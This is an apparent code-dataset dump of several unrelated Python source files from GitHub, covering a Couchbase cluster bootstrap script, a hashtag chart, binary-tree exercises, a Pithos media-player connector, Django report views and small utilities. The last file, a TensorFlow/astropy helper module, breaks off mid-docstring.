\"{}:{}\".format(self.node_ip_addr_or_hostname, couchbase_server_admin_port),\n \"--user={}\".format(self.admin_user),\n \"--password={}\".format(self.admin_pass),\n \"--cluster-port={}\".format(couchbase_server_admin_port),\n \"--cluster-ramsize={}\".format(self._get_effective_ram_mb()),\n \"--services=data\",\n ]\n \n exec_subprocess(subprocess_args)\n\n\n def WaitUntilLocalCouchbaseServerRunning(self):\n self.Retry(self.LocalCouchbaseServerRunningOrRaise)\n\n def LocalCouchbaseServerRunningOrRaise(self):\n urllib2.urlopen('http://{}:{}'.format(self.node_ip_addr_or_hostname, couchbase_server_admin_port))\n \n def WaitUntilNodeHealthy(self, node_ip):\n def f():\n self.NodeHealthyOrRaise(node_ip)\n \n self.Retry(f)\n\n def NodeHealthyOrRaise(self, node_ip):\n subprocess_args = [\n couchbase_cli_abs_path,\n \"server-list\",\n \"-c\",\n \"{}:{}\".format(self.initial_node_ip_addr_or_hostname, couchbase_server_admin_port),\n \"--user={}\".format(self.admin_user),\n \"--password={}\".format(self.admin_pass),\n ]\n output = exec_subprocess(subprocess_args)\n if node_ip not in output:\n raise Exception(\"Did not find {} in {}\".format(node_ip, output))\n if \"unhealthy\" in output:\n raise Exception(\"Some nodes appear to be unhealthy: {}\".format(output))\n \n def NodeInit(self):\n\n subprocess_args = [\n couchbase_cli_abs_path,\n \"node-init\",\n \"-c\",\n \"{}:{}\".format(self.node_ip_addr_or_hostname, couchbase_server_admin_port),\n \"--user={}\".format(self.admin_user),\n \"--password={}\".format(self.admin_pass),\n \"--node-init-hostname={}\".format(self.node_ip_addr_or_hostname),\n ]\n \n exec_subprocess(subprocess_args)\n\n\n def Retry(self, method):\n max_retries = 10\n for i in range(max_retries):\n\n try:\n method()\n return \n except Exception as e:\n print(\"Got exception running {}. Will retry\".format(e))\n \n time.sleep(10)\n\n raise Exception(\"Gave up trying to run {}\".format(method))\n\n def ClusterInitRetry(self):\n self.Retry(self.ClusterInit)\n\n def NodeInitRetry(self):\n self.Retry(self.NodeInit)\n\n def CreateRetry(self):\n self.Retry(self.Create)\n \n def JoinRetry(self):\n self.Retry(self.Join)\n\n def RebalanceRetry(self):\n self.Retry(self.Rebalance)\n \n def Join(self):\n \n self.WaitUntilLocalCouchbaseServerRunning()\n \n self.WaitUntilNodeHealthy(self.initial_node_ip_addr_or_hostname) \n self.ServerAddRetry()\n self.WaitForNoRebalanceRunning()\n self.RebalanceRetry()\n\n def ServerAddRetry(self):\n self.Retry(self.ServerAdd)\n \n def ServerAdd(self):\n\n subprocess_args = [\n couchbase_cli_abs_path,\n \"server-add\",\n \"-c\",\n \"{}:{}\".format(self.initial_node_ip_addr_or_hostname, couchbase_server_admin_port),\n \"--user={}\".format(self.admin_user),\n \"--password={}\".format(self.admin_pass),\n \"--server-add={}\".format(self.node_ip_addr_or_hostname),\n \"--server-add-username={}\".format(self.admin_user),\n \"--server-add-password={}\".format(self.admin_pass),\n ]\n \n exec_subprocess(subprocess_args)\n\n def WaitForNoRebalanceRunning(self):\n max_retries = 200\n for i in range(max_retries):\n \n if not self.IsRebalanceRunning():\n print(\"No rebalance running. Finished waiting\")\n return \n\n print(\"Rebalance running, waiting 10 seconds\")\n time.sleep(10)\n\n def IsRebalanceRunning(self):\n \n subprocess_args = [\n couchbase_cli_abs_path,\n \"rebalance-status\",\n \"-c\",\n \"{}:{}\".format(self.initial_node_ip_addr_or_hostname, couchbase_server_admin_port),\n \"--user={}\".format(self.admin_user),\n \"--password={}\".format(self.admin_pass),\n ]\n \n output = exec_subprocess(subprocess_args)\n\n if \"notRunning\" in output:\n return False\n elif \"running\" in output:\n return True\n\n print(\"Warning: unexpected output for rebalance-status: {}\".format(output))\n\n return False \n \n \n def Rebalance(self):\n\n subprocess_args = [\n couchbase_cli_abs_path,\n \"rebalance\",\n \"-c\",\n \"{}:{}\".format(self.initial_node_ip_addr_or_hostname, couchbase_server_admin_port),\n \"--user={}\".format(self.admin_user),\n \"--password={}\".format(self.admin_pass),\n ]\n \n exec_subprocess(subprocess_args)\n\n def _get_total_ram_mb(self):\n \"\"\"\n Get total ram -- taken from http://stackoverflow.com/questions/22102999/get-total-physical-memory-in-python\n \"\"\"\n\n mem_bytes = os.sysconf('SC_PAGE_SIZE') * os.sysconf('SC_PHYS_PAGES') # e.g. 4015976448\n total_avail_ram_mb = mem_bytes / (1024. ** 2)\n\n print(\"total_avail_ram_mb: {}\".format(total_avail_ram_mb))\n return total_avail_ram_mb\n\n def _get_effective_ram_mb(self):\n \"\"\" Return the amount of effective RAM ((total RAM * muliplier) - n1ql ram allocation)\n Given a total amount of ram\n\n TODO: duplicated from mobile-testkit couchbaseserver.py -- should be consolidated\n\n \"\"\"\n\n # Leave 20% of RAM available for the underlying OS\n ram_multiplier = 0.80\n\n total_ram_mb = self._get_total_ram_mb()\n effective_avail_ram_mb = int(total_ram_mb * ram_multiplier)\n\n print(\"effective_avail_ram_mb: {}\".format(effective_avail_ram_mb))\n return effective_avail_ram_mb\n\n def AddBucket(self, bucket_name, bucket_percent_ram):\n\n if not self.is_initial_node:\n print(\"Skipping adding bucket since this is not the initial node\")\n return\n\n # Tries to avoid errors: \"Cannot create buckets during rebalance\"\n self.WaitForNoRebalanceRunning()\n \n if bucket_percent_ram < 0.0 or bucket_percent_ram > 1.0:\n raise Exception(\"invalid bucket_percent_ram: {}\".format(bucket_percent_ram))\n \n bucket_ramsize = self._get_effective_ram_mb() * bucket_percent_ram\n\n subprocess_args = [\n couchbase_cli_abs_path,\n \"bucket-create\",\n \"-c\",\n \"{}:{}\".format(self.initial_node_ip_addr_or_hostname, couchbase_server_admin_port),\n \"--user={}\".format(self.admin_user),\n \"--password={}\".format(self.admin_pass),\n \"--bucket-type={}\".format(couchbase_server_bucket_type),\n \"--bucket={}\".format(bucket_name),\n \"--bucket-ramsize={}\".format(int(bucket_ramsize)),\n \"--bucket-replica={}\".format(couchbase_server_bucket_replica),\n \"--wait\"\n ]\n \n exec_subprocess(subprocess_args)\n \n\ndef exec_subprocess(subprocess_args):\n print(\"Calling Couchbase CLI with {}\".format(\" \".join(subprocess_args)))\n \n try:\n output = subprocess.check_output(subprocess_args, stderr=subprocess.STDOUT)\n print(output)\n return output \n except subprocess.CalledProcessError as e:\n print(\n \"Error calling subprocess with {}. Return code: {}. Output: {}\".format(\n subprocess_args,\n e.returncode,\n e.output\n )\n )\n raise e\n\ndef discover_initial_couchbase_server_ip(cluster_id):\n \"\"\"\n Given a cluster-id, discover the ip address or hostname of the initial couchbase server node IP address.\n This will do a back off retry several times to wait for it to become available\n \"\"\"\n\n cbCluster = CouchbaseCluster(\n cluster_id=cluster_id,\n )\n cbCluster.CBBootstrapGetClusterInfoRetry()\n return cbCluster.initial_node_ip_addr_or_hostname\n\n \n\ndef main():\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--cluster-id\",\n help=\"The cluster-id to use for cbbootstrap. Should be as unique as possible, for example like an AWS stack ID ran through base64\",\n required=True)\n parser.add_argument(\"--node-ip-addr-or-hostname\",\n help=\"The ip address or hostname that will be recorded so that other couchbase servers or other components can connect to this node if it becomes initial node\",\n required=True)\n parser.add_argument(\"--admin-user\",\n help=\"The username of the Couchbase Server admin user to create or connect as\",\n required=True)\n parser.add_argument(\"--admin-pass\",\n help=\"The password of the Couchbase Server admin user to create or connect as\",\n required=True)\n\n args = parser.parse_args()\n\n\n print(\"{} called with cluster_id {}, node_ip_addr_or_hostname {}, admin user {}\".format(\n sys.argv[0],\n args.cluster_id,\n args.node_ip_addr_or_hostname,\n args.admin_user,\n ))\n\n cbCluster = CouchbaseCluster(\n cluster_id=args.cluster_id,\n node_ip_addr_or_hostname=args.node_ip_addr_or_hostname,\n )\n cbCluster.SetAdminCredentials(\n admin_user=args.admin_user,\n admin_pass=args.admin_pass,\n )\n\n # Call out to cbbootstrap API to figure out whether to create or join, then actually create or join\n cbCluster.CreateOrJoin()\n\n # Create buckets (TODO: these should be CLI arguments)\n cbCluster.AddBucket(\"data-bucket\", 0.50)\n cbCluster.AddBucket(\"index-bucket\", 0.50)\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"couchbase/sync-gateway-ami","sub_path":"src/cbbootstrap.py","file_name":"cbbootstrap.py","file_ext":"py","file_size_in_byte":14186,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"36431169044","text":"from words import word_add_array_hashtag\nfrom words import check_ascii\nfrom words import word_add\nfrom words import word_clean\nfrom words import word_print\nfrom words import words_ret_hist\nfrom words import words_delete_all\n\nfrom db import db_get_all_users\nfrom db import db_get_tweets_in_last_time\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom db import db_set_mariadb_connection\nfrom db import db_get_mariadb_cursor\n\ndef hashtag_get_most_used(cursor,delta=172800/2):\n\twords_delete_all()\n\tusers=db_get_all_users(cursor)\n\ttweets=[]\n\tfor u in users:\n\t\ttweets=db_get_tweets_in_last_time(cursor,u,delta=delta)\n\t\tfor i in range(0,len(tweets)):\n\t\t\tword_add_array_hashtag(tweets[i])\n\n\tword_clean()\n\tnames,values=words_ret_hist()\n\n\tfile = open(\"word_usage.txt\",\"w\") \n\n\tfor i in range(0,len(names)):\n\t\tfile.write(names[i]+\"\\n\") \n\n\tfile.close()\n\n\treturn names,values\n\ndef hashtag_usage_graph(cursor):\n\tprint(\"making hashtag graph\")\n\tnames,values=hashtag_get_most_used(cursor,delta=100*24*60*60)\n\tnames=names[:20]\n\tvalues=values[:20]\n\tnames.reverse()\n\tvalues.reverse()\n\t#word_print()\n\n\ty_pos = np.arange(len(names))\n\n\tmatplotlib.rcParams['font.family'] = 'Open Sans'\n\n\tplt.figure() #,dpi=300 figsize=(25.0, 16.0)\n\n\tax = plt.subplot(111)\n\tax.spines['right'].set_visible(False)\n\tax.spines['top'].set_visible(False)\n\n\tbars=plt.barh(y_pos, values, align='center',color=\"#36845b\",alpha=0.8)\n\n\tplt.yticks(y_pos, names)\n\tplt.xlabel('Usage')\n\tplt.xticks(rotation='vertical')\n\tplt.savefig('hashtag_usage_graph.png', bbox_inches='tight')\n\tprint(\"saved graph\")\n\n\nif __name__ == '__main__':\n\tdb_set_mariadb_connection()\n\tcursor = db_get_mariadb_cursor()\n\thashtag_usage_graph(cursor)\n\n","repo_name":"roderickmackenzie/mpstweets","sub_path":"hashtag_usage_graph.py","file_name":"hashtag_usage_graph.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15746357494","text":"\"\"\" \nBinary Tree Upside Down\nFor example: \nGiven a binary tree: \n 1\n / \\\n 2 3\n / \\\n4 5\nReturn the root of the new binary tree: \n 4\n / \\\n5 2\n / \\\n 3 1\n\n\"\"\" \n\n# defintion of tree node \nclass TreeNode(): \n def __init__(self, x): \n self.val = x\n self.left = None \n self.right = None \n \n# top down approach \ndef UpsideDownBinaryTree(root): \n p = root \n parent, parentRight = None, None \n while(p != None): \n left = p.left\n p.left = parentRight \n parentRight = p.right \n p.right = parent \n parent = p\n p = left \n return parent \n\n# bottom up approach \ndef UpsideDownBinaryTree(root): \n return BottomUp(root, None) \n \ndef BottomUp(p, parent): \n if(p == None): return parent \n root = BottomUp(p.left, p) \n p.left = parent.right if parent else parent \n p.right = parent \n return root \n \n \n\n","repo_name":"lvncnt/Leetcode-OJ","sub_path":"Binary-Tree/python/Binary-Tree-Upside-Down.py","file_name":"Binary-Tree-Upside-Down.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"27497434254","text":"from __future__ import absolute_import\n\nimport panflute.daemon.connector\nimport panflute.daemon.mpris\nimport panflute.mpris\n\nimport dbus\n\n\nclass Connector (panflute.daemon.connector.DBusConnector):\n \"\"\"\n Connection manager for Pithos.\n \"\"\"\n\n def __init__ (self):\n panflute.daemon.connector.DBusConnector.__init__ (self, \"pithos\", \"Pithos\",\n \"net.kevinmehall.Pithos\")\n # Pithos's icon isn't put into a common directory\n\n\n def root (self, **kwargs):\n return panflute.daemon.mpris.Root (\"Pithos\", **kwargs)\n\n\n def track_list (self, **kwargs):\n return panflute.daemon.mpris.TrackList (**kwargs)\n\n\n def player (self, **kwargs):\n return Player (**kwargs)\n\n\nclass Player (panflute.daemon.mpris.Player):\n \"\"\"\n Player object for Pithos.\n \"\"\"\n\n from panflute.util import log\n\n\n def __init__ (self, **kwargs):\n panflute.daemon.mpris.Player.__init__ (self, **kwargs)\n for feature in [\"GetCaps\", \"GetMetadata\", \"GetStatus\",\n \"Next\", \"Pause\", \"Stop\", \"Play\"]:\n self.register_feature (feature)\n\n bus = dbus.SessionBus ()\n proxy = bus.get_object (\"net.kevinmehall.Pithos\", \"/net/kevinmehall/Pithos\")\n self.__pithos = dbus.Interface (proxy, \"net.kevinmehall.Pithos\")\n\n self.cached_caps.all = panflute.mpris.CAN_GO_NEXT | \\\n panflute.mpris.CAN_PAUSE | \\\n panflute.mpris.CAN_PLAY | \\\n panflute.mpris.CAN_PROVIDE_METADATA\n\n self.__handlers = [\n self.__pithos.connect_to_signal (\"PlayStateChanged\", self.__play_state_changed_cb),\n self.__pithos.connect_to_signal (\"SongChanged\", self.__song_changed_cb)\n ]\n\n self.__pithos.IsPlaying (reply_handler = self.__play_state_changed_cb,\n error_handler = self.log.warn)\n self.__pithos.GetCurrentSong (reply_handler = self.__song_changed_cb,\n error_handler = self.log.warn)\n\n\n def remove_from_connection (self):\n for handler in self.__handlers:\n handler.remove ()\n self.__handlers = []\n\n panflute.daemon.mpris.Player.remove_from_connection (self)\n\n\n def do_Next (self):\n self.__pithos.SkipSong (reply_handler = lambda: None,\n error_handler = self.log.warn)\n\n\n def do_Pause (self):\n if self.cached_status.state == panflute.mpris.STATE_PLAYING:\n self.__pithos.PlayPause (reply_handler = lambda: None,\n error_handler = self.log.warn)\n\n\n def do_Stop (self):\n self.do_Pause ()\n\n\n def do_Play (self):\n if self.cached_status.state != panflute.mpris.STATE_PLAYING:\n self.__pithos.PlayPause (reply_handler = lambda: None,\n error_handler = self.log.warn)\n\n\n def __play_state_changed_cb (self, playing):\n \"\"\"\n Called when the playback state changes.\n \"\"\"\n\n if playing:\n self.cached_status.state = panflute.mpris.STATE_PLAYING\n else:\n self.cached_status.state = panflute.mpris.STATE_PAUSED\n\n\n def __song_changed_cb (self, song):\n \"\"\"\n Called when the current song changes.\n \"\"\"\n\n self.log.debug (\"New song: {0}\".format (song))\n if song is not None and len (song) > 0:\n metadata = {}\n if \"title\" in song:\n metadata[\"title\"] = song[\"title\"]\n if \"artist\" in song:\n metadata[\"artist\"] = song[\"artist\"]\n if \"album\" in song:\n metadata[\"album\"] = song[\"album\"]\n if \"songDetailURL\" in song:\n metadata[\"location\"] = song[\"songDetailURL\"]\n self.cached_metadata = metadata\n else:\n self.cached_metadata = {}\n","repo_name":"benpicco/mate-panflute","sub_path":"src/panflute/daemon/pithos.py","file_name":"pithos.py","file_ext":"py","file_size_in_byte":3987,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"4191890265","text":"\"\"\"Configuration constants\"\"\"\n\nimport locale\nfrom typing import List\n\ndef _unique(data_list: List[str]) -> List[str]:\n return_list: List[str] = []\n for cat in data_list:\n if cat not in return_list:\n return_list.append(cat)\n\n return return_list\n\nDATE_FORMAT = \"%m/%d/%Y\" # the format for date print\nTHOUSAND_SEP = True # whether the amount has a thousands separator\nLOCALE = locale.LC_ALL # the local to use for currency print\nUSE_SQL = False # determines whether to use SQL or XML\nFILE_NAME = \"2021.xml\" # the XML file name\nDB_NAME = \"checkbook.db\" # the SQL database file name\nDEBIT_CATEGORIES = [\"Groceries\", \"Gas\", \"Bills\", \"Entertainment\", \"Food\", \"Savings\", \"Good Time\",\"Vacation\",\"Christmas\", \"Wedding\", \"Medical\",\"Whiskey\", \"Other\"]\nCREDIT_CATEGORIES = [\"Bills\", \"Other\", \"Paycheck\"]\nCATEGORIES = _unique(DEBIT_CATEGORIES + CREDIT_CATEGORIES) # Categories to choose for transactions\nCATEGORIES_FOR_ADD = {\"Debit\": DEBIT_CATEGORIES, \"Credit\": CREDIT_CATEGORIES, \"all\": CATEGORIES}\nDEBIT_MULTIPLIER = -1\nSORT_BY_KEY = \"Date\"\n","repo_name":"amkirby/Checkbook","sub_path":"Constants/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"41950322680","text":"import datetime\nimport json\nfrom django.shortcuts import render\nfrom django.views.decorators.http import require_POST\nfrom django.http import Http404, JsonResponse\nfrom django.contrib.auth.decorators import login_required\nfrom django.forms.models import model_to_dict\nfrom common.models import Product\nfrom contacts.models import Contact\nfrom accounts.models import Account\nfrom bills.models import Bill\nfrom spend.models import Spend\n\n# Create your views here.\ndef get_early_date(dates):\n print(\"get_early_data#######\")\n print(dates)\n return min(dates)\n\ndef gen_trend_data(data, sdate, step):\n now = datetime.datetime.now().date()\n \n summary = {}\n data_trend = []\n if step == 7:\n sdate = sdate - datetime.timedelta(days=sdate.weekday())\n edate = now + datetime.timedelta(days=6-now.weekday())\n elif step == 30:\n sdate = datetime.date(sdate.year, sdate.month, 1)\n edate = datetime.date(now.year, now.month + 1, 1) - datetime.timedelta(days=1)\n else:\n edate = now + datetime.timedelta(days=step)\n date = sdate\n while date <= edate:\n element = {'date':date.strftime(\"%Y-%m-%d\")}\n profit = 0\n for key in data.keys():\n dlist = data[key]\n idx = 0\n amount = 0\n #print(key) \n for i in range(len(dlist)):\n if dlist[i].created_on.date() > date:\n break\n amount += dlist[i].amount\n if 'total' in key:\n #print(\"found total\")\n profit += (dlist[i].price - dlist[i].product.cost)*dlist[i].quantity\n #print(profit)\n idx = i+1\n #idx = accounts.index(account)\n del dlist[0:idx]\n element[key] = amount\n \n\n if key in summary.keys():\n summary[key] += amount\n else:\n summary[key] = amount\n #print(element)\n element['profit'] = profit\n data_trend.append(element)\n date = date + datetime.timedelta(days=step)\n return data_trend, summary\n\n@login_required\ndef report(request):\n contact_detail = []\n spend_detail = []\n summary = {'total': 0, 'paid': 0, 'remain': 0, 'spend':0, 'paid_percent':0, 'remain_percent':0, 'profit':0}\n if request.method == \"GET\":\n step = 1\n \n contacts = Contact.objects.all().order_by(\"created_on\")\n for contact in contacts:\n aclist = Account.objects.filter(contacts=contact).values_list('amount', flat=True)\n blist = Bill.objects.filter(contact=contact).values_list('amount', flat=True)\n total = sum(aclist)\n paid = sum(blist)\n if total != 0:\n contact_detail.append({'id':contact.id, 'name':contact.name, 'total': total, 'remain':round((total-paid)/total*100,2), 'paid':round((paid)/total*100,2)})\n else:\n contact_detail.append({'id':contact.id, 'name':contact.name, 'total': 0, 'remain':0, 'paid':0})\n products = Product.objects.all()\n for product in products:\n spend_list = Spend.objects.filter(product=product).values_list('amount', flat=True)\n spend_detail.append({'name':product.name, 'total':sum(spend_list)})\n else:\n sdict = {'1':1, '2':7,'3':30,'4':360}\n key = request.POST.get('step')\n if key in sdict.keys():\n step = sdict[key]\n else:\n raise Http404(\"Not support step\")\n\n\n\n data_trend = [] \n total = 0\n cost = 0\n amount = 0\n \n accounts = Account.objects.all().order_by(\"created_on\")\n bills = Bill.objects.all().order_by(\"created_on\") \n spends = Spend.objects.all().order_by(\"created_on\") \n freight = Spend.objects.filter(product__name__contains='运费').order_by(\"created_on\") \n accounts = list(accounts)\n bills = list(bills)\n spends = list(spends)\n freight = list(freight)\n print(freight)\n sdate = None\n dates = []\n if len(bills):\n dates.append(bills[0].created_on.date())\n if len(spends):\n dates.append(spends[0].created_on.date())\n if len(accounts):\n dates.append(accounts[0].created_on.date())\n sdate = min(dates)\n \n if sdate:\n data = {'total': accounts, 'paid': bills, 'spend':spends, 'freight':freight}\n data_trend, summary = gen_trend_data(data, sdate, step)\n summary['remain'] = summary['total'] - summary['paid']\n summary['profit'] = 0\n profit_list = Account.objects.values_list('product__cost', 'price', 'quantity')\n for i in data_trend:\n if i['profit'] != 0:\n print(\"%s %d\"%(i['date'],i['profit']))\n for element in list(profit_list):\n summary['profit'] += (element[1] - element[0])*element[2]\n\n context_data = {\n 'summary':summary,\n 'data_trend': json.dumps(data_trend),\n 'contacts': contact_detail,\n 'spends': json.dumps(spend_detail)\n }\n else:\n context_data = {\n 'summary':summary,\n 'data_trend': [],\n 'contacts': contact_detail,\n 'spends': spend_detail\n }\n\n print(context_data)\n if request.method == \"GET\":\n return render(request, 'report.html', context_data)\n else:\n print(\"return POST data\")\n print(data_trend)\n return JsonResponse({'result': data_trend, 'ok':1})\n\n@require_POST\ndef get_contact_trend(request):\n id = request.POST.get('id')\n step = int(request.POST.get('step'))\n if id:\n contact = Contact.objects.get(pk=id)\n print(contact)\n accounts = Account.objects.filter(contacts=contact).order_by(\"created_on\")\n bills = Bill.objects.filter(contact=contact).order_by(\"created_on\")\n print(accounts)\n print(bills)\n accounts = list(accounts)\n bills = list(bills)\n dates = []\n dates.append(datetime.datetime.now().date())\n if len(bills):\n dates.append(bills[0].created_on.date())\n if len(accounts):\n dates.append(accounts[0].created_on.date())\n print(model_to_dict(accounts[0]))\n sdate = get_early_date(dates)\n data = {'total': accounts, 'paid': bills}\n data_trend, summary = gen_trend_data(data, sdate, step)\n #summary['remain'] = summary['total'] - summary['paid']\n return JsonResponse({'result': data_trend, 'ok':1})\n else:\n return JsonResponse({'ok':0})","repo_name":"sordhlm/dj_css","sub_path":"report/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13596383191","text":"import PyPDF2 as pdf\nname=input(\"Enter the file name (With extension)\")\np=name[-3::]\nprint()\nif(p==\"pdf\"):\n pdf_name=open(name,'rb')\n pdf_obj=pdf.PdfFileReader(pdf_name)\n with open(\"extracted_data.txt\",\"w\") as f:\n for i in range(pdf_obj.getNumPages()):\n data=pdf_obj.getPage(i).extractText()\n f.write(data)\n f.write(\"\\n\")\n f=open(\"extracted_data.txt\",\"r\")\n contents=f.read()\n f.close()\n print(contents)\n\nelif(p==\"txt\"):\n print(\"This is a text file\")\n myfile=open(name,\"rt\")\n contents=myfile.read()\n myfile.close()\n print(contents) \n\nelse:\n print(\"The input file is not in pdf or text format\")\n\n","repo_name":"sumukhhk/HPE","sub_path":"pypdf2.py","file_name":"pypdf2.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24453545922","text":"# naprawa kodowania pobranego json'a\r\n# plik do poprawy jako argumenty w skrypcie w CMD | | skrypt.py plik1.json\r\nimport json\r\nimport sys\r\n\r\n# sprawdzenie czy argumenty podane\r\nif len(sys.argv) != 2:\r\n exit(\"Niepoprawna ilość argumentów, potrzebny jest jeden\")\r\n\r\nfriends_file = open(sys.argv[1], mode=\"r\")\r\n# print(friends_file) # sprawdzenie kodowania cp1250, utf8\r\ndata_friends = json.load(friends_file)\r\nfriends_file.close()\r\ndata_friends_fixed = data_friends.copy()\r\n\r\n# poprawa kodowania\r\nfor x, y in enumerate(data_friends[\"friends_v2\"]):\r\n data_friends_fixed[\"friends_v2\"][x][\"name\"] = y[\"name\"].encode(\"latin1\").decode(\"utf8\")\r\n\r\n# nowa nazwa pliku | uzyte string[:-5]\r\nnew_file_name = (sys.argv[1])[:-5] + \"_fixed.json\"\r\n\r\n# zapis poprawionego pliku json\r\nwith open(new_file_name, \"w\", encoding=\"utf8\") as file:\r\n json.dump(data_friends_fixed, file, ensure_ascii=False, indent=2)\r\n\r\nprint(\"Zapisano do pliku:\", new_file_name)\r\n\r\n","repo_name":"kam7il/unfriend-FB-finder","sub_path":"G_fejsFrendy_fix_encode_json_v1_1.py","file_name":"G_fejsFrendy_fix_encode_json_v1_1.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27640189803","text":"import os\n\nfrom types import FunctionType\nfrom typing import List\nfrom typing import Iterable\nfrom typing import Tuple\n\nimport numpy as np\nimport tensorflow.compat.v1 as tf\n\nfrom colorama import init, Fore\nfrom astropy.io import fits\n\ninit(autoreset=True)\n\n\nclass TFLogger:\n \"\"\"A helper class to color the logging text in TensorFlow.\"\"\"\n\n RED = lambda s: Fore.RED + str(s) + Fore.RESET\n BLUE = lambda s: Fore.BLUE + str(s) + Fore.RESET\n YELLOW = lambda s: Fore.YELLOW + str(s) + Fore.RESET\n GREEN = lambda s: Fore.GREEN + str(s) + Fore.RESET\n LIGHTRED = lambda s: Fore.LIGHTRED_EX + str(s) + Fore.RESET\n\n @staticmethod\n def info(msg: str) -> None:\n \"\"\"Log at info level in green.\n\n @staticmethod\n @staticmethodgged\n @staticmethod\n Returns:\n None\n \"\"\"\n tf.logging.info(TFLogger.GREEN(msg))\n\n @staticmethod\n def debug(msg: str) -> None:\n \"\"\"Log at debug level in yellow.\n\n Args:\n msg (str): The string to be logged\n\n Returns:\n None\n \"\"\"\n tf.logging.debug(TFLogger.YELLOW(msg))\n\n @staticmethod\n def warn(msg: str) -> None:\n \"\"\"Log at warn level in lightred.\n\n Args:\n msg (str): The string to be logged\n\n Returns:\n None\n \"\"\"\n tf.logging.warning(TFLogger.LIGHTRED(msg))\n\n @staticmethod\n def error(msg: str):\n \"\"\"Log at error level in red.\n\n Args:\n msg (str): The string to be logged\n\n Returns:\n None\n \"\"\"\n tf.logging.error(TFLogger.RED(msg))\n\n @staticmethod\n def tensor_shape(tensor: tf.Tensor, log_func=None, format_str=\"[{}]::{}\") -> None:\n \"\"\"Log the the shape of tensor 't'.\n\n Args:\n tensor (tf.Tensor): A tensorflow Tensor\n logging_func (func): logging function to to use, default\n tf_logger.debug\n format_str (str): A string that will be passed will have .format called\n on it and given two arguments in the following order:\n - tensor_name\n - tensor_shape\n Returns:\n None\n \"\"\"\n if log_func is None:\n log_func = TFLogger.debug\n\n log_func(format_str.format(tensor.name, tensor.shape.as_list()))\n\n\nclass OptionalFunc:\n \"\"\"Descriptor protocol for functions that don't have to overriden.\n\n This is a helper class that is used to stub methods that don't have to\n be overridden.\n \"\"\"\n\n def placeholder(self, *args):\n \"\"\"Placeholder function used as default in __init__\"\"\"\n return list(args)\n\n def __init__(self, warn_msg: str, init_func: FunctionType = None):\n \"\"\"\"\"\"\n self._warn_msg = warn_msg\n self._func = init_func if init_func else self.placeholder\n self._is_default = True\n\n def __get__(\n self, obj, type=None # pylint: disable=redefined-builtin\n ) -> FunctionType:\n if self._is_default:\n TFLogger.warn(self._warn_msg)\n\n return self._func\n\n def __set__(self, obj, value) -> None:\n self._is_default = False\n self._func = value\n\n\nclass FitsHelper:\n \"\"\"A class that handles basic FITS file functions.\"\"\"\n\n @staticmethod\n def create_file(file_name: str, data_shape: tuple, dtype) -> None:\n \"\"\"Creates a fits file without loading it into memory.\n\n This is a helper method to create large FITS files without loading an\n array into memory. The method follows the direction given at:\n http://docs.astropy.org/en/stable/generated/examples/io/skip_create-large-fits.html\n\n\n Args:\n file_name (str): the complete path to the file to be created.\n data_shape (tuple): a tuple describe the shape of the file to be\n created\n dtype (numpy datatype): the numpy datatype used in the array\n\n Raises:\n ValueError if dtype is not one of:\n - np.unit8\n - np.int16\n - np.int32\n - np.float32\n - np.float64\n\n\n TODO: Figure out why this throws warning about size occasionally\n when files that are created by it are opened\n \"\"\"\n bytes_per_value = 0\n\n if dtype == np.uint8:\n bytes_per_value = 1\n elif dtype == np.int16:\n bytes_per_value = 2\n elif dtype == np.int32:\n bytes_per_value = 4\n elif dtype == np.float32:\n bytes_per_value = 4\n elif dtype == np.float64:\n bytes_per_value = 8\n\n if bytes_per_value == 0:\n raise ValueError(\"Invalid dtype\")\n\n stub_size = [100, 100]\n if len(data_shape) == 3:\n stub_size.append(5)\n stub = np.zeros(stub_size, dtype=dtype)\n\n hdu = fits.PrimaryHDU(data=stub)\n header = hdu.header\n while len(header) < (36 * 4 - 1):\n header.append()\n\n header[\"NAXIS1\"] = data_shape[1]\n header[\"NAXIS2\"] = data_shape[0]\n if len(data_shape) == 3:\n header[\"NAXIS3\"] = data_shape[2]\n\n header.tofile(file_name)\n\n with open(file_name, \"rb+\") as f:\n header_size = len(header.tostring())\n data_size = (np.prod(data_shape) * bytes_per_value) - 1\n\n f.seek(header_size + data_size)\n f.write(b\"\\0\")\n\n @staticmethod\n def get_files(\n file_names: List[str], mode: str = \"readonly\"\n ) -> (List[fits.HDUList], List[np.ndarray]):\n \"\"\"Gets the HDULS and data handles for all the files in file_names.\n\n This is a convience function to opening multiple FITS files using\n memmap.\n\n Args:\n file_names (List[str]): a list of file names including paths to FITS\n files\n mode (str): the mode to pass to fits.open\n\n Returns:\n Tuple of a list numpy arrays that are the mmapped data handles for\n each of the FITS files and the HDULs that go along with them\n \"\"\"\n arrays = []\n hduls = []\n\n for f in file_names:\n hdul = fits.open(f, mode=mode, memmap=True)\n arrays.append(hdul[0].data) # Astropy problem pylint: disable=E1101\n hduls.append(hdul)\n\n return hduls, arrays\n\n @staticmethod\n def create_mean_var_files(\n shape: List[int], out_dir: str\n ) -> (List[fits.HDUList], List[np.ndarray]):\n \"\"\"Creates the output fits files for the mean/variance morpheus output.\n\n Args:\n shape (List[int]): The shape to use when making the FITS files\n out_dir (str): the directory to place the files in. Will make it\n if it doesn't already exist.\n\n Returns:\n List[fits.HDUList]: for the created files\n Dict(str, np.ndarray): a dictionary where the key is the 